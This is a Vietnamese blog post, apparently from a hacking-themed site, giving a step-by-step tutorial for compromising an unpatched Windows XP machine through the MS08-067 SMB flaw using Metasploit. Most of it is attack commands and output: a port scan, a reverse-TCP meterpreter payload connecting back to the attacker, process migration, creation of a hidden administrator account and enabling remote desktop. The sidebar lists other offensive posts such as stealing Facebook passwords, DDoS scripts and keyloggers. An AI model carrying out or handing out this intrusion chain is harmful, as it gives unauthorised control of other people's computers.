Template Mobile Green

  • Trang chủ
  • Tìm kiếm
  • Thư viện
    Home » Unlabelled

    [TUT] Khai thác và remote desktop window XP qua ms08_067_netapi

    Post on 23:24 with No comments

    [TUT] Khai thác và remote desktop window XP qua ms08_067_netapi
    Thử làm một cái tut về metasploit :) Do mình vẫn đang học nên có gì sai sót anh em PM để mình chỉnh lại nha :)
    Đầu tiên, target phải chạy window XP và không cập nhật bản vá nào cho lỗi trên (có thể khai thác thử, nếu không được có khả năng là đã cập nhật).
    Các bước làm như sau (em ghét quay video lắm) với giả sử mục tiêu là nội bộ trong mạng:
    Attacker IP: 192.168.1.112 (OS: Kali/Backtrack)
    Victim IP: 192.168.1.128 (OS: WIndowXP, port 445 open)
    Bước 1: Scan để kiểm tra mục tiêu (TERMINAL 1)
    root@bt ~> nmap 192.168.1.128 -p 445
    Nếu thấy là 445 open Microsoft -ds gì đó là ngon rồi :)….
    Bước 2: Khai thác (TERMINAL 2) – chữ xanh là giải thích nha
    msfconsole (vào công cụ metasploit)
    msf> use windows/smb/ms08_067_netapi   (dùng exploit ms08_067_netapi)
    msf(ms08_067_netapi) > set RHOST 192.168.1.128 (cái này là IP của victim)
    msf(ms08_067_netapi) > set LHOST 192.168.1.112  (cái này là IP của mình, sử dụng ifconfig để biết nha)
    msf(ms08_067_netapi) > set PAYLOAD windows/meterpreter/revese_tcp (cái này có thể xem là một con trojan vì nó sẽ mở cửa máy victim và connect với mình)
    msf(ms08_067_netapi) > exploit (sau khi set xong các tùy chọn thì giờ thực hiện khai thác)
    (Mấy cái thông báo là quá trình khai thác thôi, mình tự nhớ lại nên không chính xác lắm nha)
    [*] Started reverse handler on 192.168.1.112:4444
    [*] Automatically detecting the target…
    [*] Fingerprint: Windows XP – Service Pack 3 – lang:English
    [*] Selected Target: Windows XP SP3 English (NX)
    [*] Attempting to trigger the vulnerability…
    [*] Sending stage (749056 bytes) to 192.168.1.128
    [*] Meterpreter session 1 opened (192.168.1.112:4444 -> 192.168.1.128:1472)
    (Khi xuất hiện được meterpreter> là khai thác thành công :D )
    meterpreter> ps (Liệt kê danh sách process…ở đây mình chỉ quan tâm tới process nào được thực thi dưới quyền Administrator để “di trú” sang đó)
    147 1 explorer.exe windows/Administrator
    meterpreter> migrate 147 (Di trú sang process explorer.exe…Muốn thấy được sự khác nhau thì hãy sử dụng lên getuid trước và sau lệnh này nhé :P )
    migration successfully
    meterpreter> net user rain sos /add (Tạo user rain với password sos, chú ý, chỉ có thể tạo khi di trú sang process có quyền Administrator hoặc con reverse_tcp đang chạy dưới quyền Administrator)
    Command completed successfully!
    meterpreter> net localgroup administrators rain /add (Thêm vào group administrators thôi)
    Command completed successfully!
    meterpreter> run getgui -e (Enable remote desktop)
    Tới đây là coi như ngon rồi đấy, giờ chỉ remote vào xem thôi ^_^
    Bước 3: Remote Desktop (TERMINAL 1 đi, nãy chạy nmap đó)
    root@bt ~> rdesktop 192.168.1.128 (IP của victim nha)
    Xong nhập username/password: rain/sos :)
    Xin cám ơn! Nếu được nhiệt liệt hưởng ứng, chúng ta có thể cùng học metasploit :)
    Note: bài viết được viết theo trí nhớ của hôm offline CEH-Việt :) Có gì thắc mắc cứ vào ceh.vn nha :)
    Hãy gửi bài bạn cảm thấy hay về email: jo3ght@gmail.com


    Đăng bài lên facebook !

    ĐĂNG NHẬN XÉT
    Cám ơn đã đọc bài viết!
    + Mọi sai xót, thắc mắc xin chia sẻ bên dưới.
    + Hãy viết bằng tiếng Việt có dấu mọi người nha.

    Bài viết có 0 nhận xét:

    Đăng nhận xét

Chia Sẻ Bài Viết Hay

  • Hack forum với method DNN
    Hack forum với method DNN tìm các forum lỗi với dork chính sau inurl:/portals/0/default.aspx inurl:/tabid/36/language/en-US/Default.aspx Mìn...
  • MỘT SỐ TOOL BOMB MAIL
    MỘT SỐ TOOL BOMB MAIL Code bomb mail dễ blacklist IP server, mèng leech 3 tool bomb cũng có chút hiệu quả về cho anh em xài Method : SMTP ht...
  • [2 PSD] CMND Để Unlock
    Download Download
  • Công cụ khai thác SQL
    Havij SQL Injection Havij là  một tự động  SQL Injection  phần mềm  giúp kiểm tra sự thâm nhập  để tìm kiếm  và  tận dụng lợi thế của  các l...
  • PSD CMND unlock
    Download Download
  • Lấy PASSWORD FB của người khác
    Nguồn Jo3 DOWNLOAD CODE DOWNLOAD LISTPASS ok bây h lấy id nó mở cmd à mà tải code nữa nhnhe đi đến chỗ lưu code mình luw ở desktop ok bắt đầ...
  • Phát hiện lỗ hổng XSS chính xác, nhanh gọn với Burp Suite và PhantomJS
    XSS hiện nay là một loại lỗ hổng web ngày càng trở nên phổ biến và nguy hiểm. Trong bài này mình sẽ hướng dẫn các bạn cách tìm lỗ hổng web m...
  • Làm Sao Để Vượt Thoát Kiểm Duyệt Internet
    Làm Sao Để Vượt Thoát Kiểm Duyệt Internet Mẹo Vặt Đơn Giản Có một số kỹ thuật để vượt kiểm duyệt mạng.  Nếu mục đích của bạn chỉ là truy cập...
  • [video] Tổng hợp về botnet
    Đây là những video mình sưu tầm từ nhiều nguồn!!  http://www.mediafire.com/download.php?qqtc0ad59vqrrji http://www.mediafire.com/download.ph...
  • Cách cài hệ điều hành Kali linux vào điện thoại của bạn
    Yêu cầu: Sạc đầy điện thoại Android Mạng ngon Ít nhất 5GB còn trống Bước 1. Tải về Linux ứng dụng trong điện thoại di động Android từ Google...

Danh Mục Chia Sẻ

  • Bảo Mật
  • Code
  • Code web
  • DDos
  • DEEP WEB
  • Facebook
  • Kho Tut
  • News
  • Python
  • Tài liệu
  • Thủ thuật
  • Tools
  • UG
  • Virus

Giới thiệu về tôi

Unknown
Xem hồ sơ hoàn chỉnh của tôi

GAME ANDROID

Lưu trữ Blog

  • ►  2016 (111)
    • ►  tháng 7 (1)
    • ►  tháng 6 (18)
    • ►  tháng 5 (24)
    • ►  tháng 4 (17)
    • ►  tháng 3 (19)
    • ►  tháng 2 (15)
    • ►  tháng 1 (17)
  • ▼  2015 (117)
    • ►  tháng 12 (5)
    • ►  tháng 11 (17)
    • ►  tháng 10 (17)
    • ►  tháng 7 (56)
    • ▼  tháng 6 (22)
      • [TUT] NAME_CONST SQL Injection [Pics]
      • Share Tool DDOS mạnh
      • Giải thích làm thế nào để thâm nhập vào các trang web
      • Hướng dẫn cách chống Hack và xóa bỏ Shell cho Website
      • Làm thế nào để tìm thấy trang đăng nhập quản trị t...
      • Công cụ khai thác SQL
      • Lỗ hổng DOM XSS trong WordPress SEO by Yoast
      • Tổng hợp template xem phim Online cho blogger
      • Hack một máy tính Sử dụng Ardamax Keylogger
      • Tạo site map đẹp cho blogger
      • Share code web Facebook
      • SHARE CODE PHP DDOS GHT
      • Simple PHP DDOS script
      • Hướng dẫn tổng hợp, chi tiết cơ bản nhất các bước ...
      • Hack forum với method DNN
      • Hướng dẫn upload shell thông qua lỗi SQLite Manage...
      • [TUT] Khai thác lỗi SQL Injection dạng error-based...
      • [Tool] Quick Blind SQL Injection script
      • [Tool] Mail account checker
      • [TUT] Khai thác và remote desktop window XP qua ms...
      • [REPORT] Đánh cắp thông tin tài khon được lưu trên...
      • [SQLi] CIS Manager CMS
  • ►  2014 (1)
    • ►  tháng 6 (1)
Được tạo bởi Blogger.

BIT Templates © 2013
Wap Mobile


↑ Lên đầu trang ↑